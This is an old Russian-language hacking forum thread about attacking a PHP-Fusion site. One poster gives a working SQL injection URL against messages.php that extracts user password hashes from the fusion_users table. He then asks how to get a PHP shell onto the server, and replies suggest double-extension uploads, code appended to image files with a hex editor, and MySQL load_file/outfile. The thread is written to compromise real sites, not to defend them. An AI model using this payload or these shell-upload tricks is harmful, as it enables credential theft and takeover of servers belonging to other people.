 |
Sql инъекция в движке php_fusion |
06.12.2005, 20:45
|
|
Познающий
Регистрация: 10.11.2005
Сообщений: 75
С нами:
10789409
Репутация:
4
|
|
Sql инъекция в движке php_fusion
Ну вообщем работает тема. Стал админом, а дальше, как php файл на сервер загрузить, через админ панель и функцию аплоада вайлов не получается, пишет, что формат не тот, загружает эта функция в папку downloads, а в ней содержатся, архивы, максимум изображения. Так как пхп туда запхнуть???
Заранее спасибо!!!
|
|
|
06.12.2005, 20:53
|
|
Флудер
Регистрация: 08.11.2004
Сообщений: 3,395
С нами:
11317286
Репутация:
3876
|
|
что значит "работает тема"?
Почему ты назвал тему "Sql инъекция в движке php_fusion".. и нигде про эту инъекцию не упоминаешь?! Гм.. а вопрос вообще спрашиваешь как туда залить шелл..
|
|
|
|
06.12.2005, 21:01
|
|
Познающий
Регистрация: 10.11.2005
Сообщений: 75
С нами:
10789409
Репутация:
4
|
|
messages.php?folder=inbox&show=H'%20union%20select %201,1,1,user_password,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1+from+fusion_users/*
Иньекция после "messages.php?folder=inbox&show=" - имеет место быть! Вообщем да, вопрос не в этом, а втом, как туда залить PHP файлик?  |
|
|
|
06.12.2005, 21:07
|
|
Участник форума
Регистрация: 04.12.2005
Сообщений: 202
С нами:
10754840
Репутация:
99
|
|
попробуй file.php.jpg, потом обратись usl/file.php.... но не факт что сработает из-за ограничения на исполнение в папке, так или иначе попробуй... если руганется на недопустимый тип файлов, то в руки hex-editor, добавляешь в конец *.jpg(gif,... etc) свой код и сохраняешь.
|
|
|
|
06.12.2005, 21:07
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
С нами:
10937126
Репутация:
1316
|
|
load_file
outfile
|
|
|
|
06.12.2005, 21:21
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2005
Сообщений: 1,662
С нами:
10897046
Репутация:
1329
|
|
dams baga rulez...
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
